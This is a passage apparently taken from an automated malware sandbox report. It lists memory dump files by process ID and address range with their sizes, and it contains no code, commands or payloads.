  • memory/2456-311-0x0000000002590000-0x00000000025A0000-memory.dmp

    Filesize

    64KB

  • memory/2456-362-0x0000000002590000-0x00000000025A0000-memory.dmp

    Filesize

    64KB

  • memory/2456-372-0x0000000002590000-0x00000000025A0000-memory.dmp

    Filesize

    64KB

  • memory/2492-205-0x0000000004F10000-0x0000000004F20000-memory.dmp

    Filesize

    64KB

  • memory/2492-319-0x0000000004F10000-0x0000000004F20000-memory.dmp

    Filesize

    64KB

  • memory/2492-360-0x0000000004F10000-0x0000000004F20000-memory.dmp

    Filesize

    64KB

  • memory/2492-387-0x0000000004F10000-0x0000000004F20000-memory.dmp

    Filesize

    64KB

  • memory/2492-338-0x0000000004F10000-0x0000000004F20000-memory.dmp

    Filesize

    64KB

  • memory/2492-304-0x0000000004F10000-0x0000000004F20000-memory.dmp

    Filesize

    64KB

  • memory/3080-202-0x0000000005610000-0x0000000005620000-memory.dmp

    Filesize

    64KB

  • memory/3080-204-0x0000000005980000-0x00000000059A2000-memory.dmp

    Filesize

    136KB

  • memory/3080-307-0x0000000006850000-0x000000000686E000-memory.dmp

    Filesize

    120KB

  • memory/3080-335-0x0000000005610000-0x0000000005620000-memory.dmp

    Filesize

    64KB

  • memory/3672-193-0x0000000000400000-0x0000000000723000-memory.dmp

    Filesize

    3.1MB

  • memory/3672-293-0x0000000000400000-0x0000000000723000-memory.dmp

    Filesize

    3.1MB

  • memory/3672-144-0x0000000002810000-0x0000000002811000-memory.dmp

    Filesize

    4KB

  • memory/3676-315-0x0000000005F30000-0x0000000005F4A000-memory.dmp

    Filesize

    104KB

  • memory/3676-196-0x0000000004520000-0x0000000004530000-memory.dmp

    Filesize

    64KB

  • memory/3676-323-0x0000000004520000-0x0000000004530000-memory.dmp

    Filesize

    64KB

  • memory/3676-321-0x0000000004520000-0x0000000004530000-memory.dmp

    Filesize

    64KB

  • memory/3676-201-0x0000000004520000-0x0000000004530000-memory.dmp

    Filesize

    64KB

  • memory/3676-312-0x0000000004520000-0x0000000004530000-memory.dmp

    Filesize

    64KB

  • memory/3676-373-0x0000000004520000-0x0000000004530000-memory.dmp

    Filesize

    64KB

  • memory/4252-314-0x00000000074C0000-0x0000000007556000-memory.dmp

    Filesize

    600KB

  • memory/4252-330-0x0000000002F20000-0x0000000002F30000-memory.dmp

    Filesize

    64KB

  • memory/4252-326-0x0000000002F20000-0x0000000002F30000-memory.dmp

    Filesize

    64KB

  • memory/4252-200-0x0000000002F20000-0x0000000002F30000-memory.dmp

    Filesize

    64KB

  • memory/4252-386-0x0000000002F20000-0x0000000002F30000-memory.dmp

    Filesize

    64KB

  • memory/4252-318-0x0000000002F20000-0x0000000002F30000-memory.dmp

    Filesize

    64KB

  • memory/4392-317-0x0000000007A10000-0x0000000007FB4000-memory.dmp

    Filesize

    5.6MB

  • memory/4392-208-0x0000000005DE0000-0x0000000005E46000-memory.dmp

    Filesize

    408KB

  • memory/4392-198-0x00000000030B0000-0x00000000030C0000-memory.dmp

    Filesize

    64KB

  • memory/4392-371-0x00000000030B0000-0x00000000030C0000-memory.dmp

    Filesize

    64KB

  • memory/4392-310-0x00000000030B0000-0x00000000030C0000-memory.dmp

    Filesize

    64KB

  • memory/4392-322-0x00000000030B0000-0x00000000030C0000-memory.dmp

    Filesize

    64KB

  • memory/4392-199-0x00000000030B0000-0x00000000030C0000-memory.dmp

    Filesize

    64KB

  • memory/4392-328-0x00000000030B0000-0x00000000030C0000-memory.dmp

    Filesize

    64KB

  • memory/4392-206-0x0000000005D70000-0x0000000005DD6000-memory.dmp

    Filesize

    408KB

  • memory/5020-369-0x0000000005230000-0x0000000005240000-memory.dmp

    Filesize

    64KB

  • memory/5020-320-0x0000000008C40000-0x00000000092BA000-memory.dmp

    Filesize

    6.5MB

  • memory/5020-359-0x0000000005230000-0x0000000005240000-memory.dmp

    Filesize

    64KB

  • memory/5020-303-0x0000000005230000-0x0000000005240000-memory.dmp

    Filesize

    64KB

  • memory/5020-309-0x0000000005230000-0x0000000005240000-memory.dmp

    Filesize

    64KB

  • memory/5020-316-0x0000000006C90000-0x0000000006CB2000-memory.dmp

    Filesize

    136KB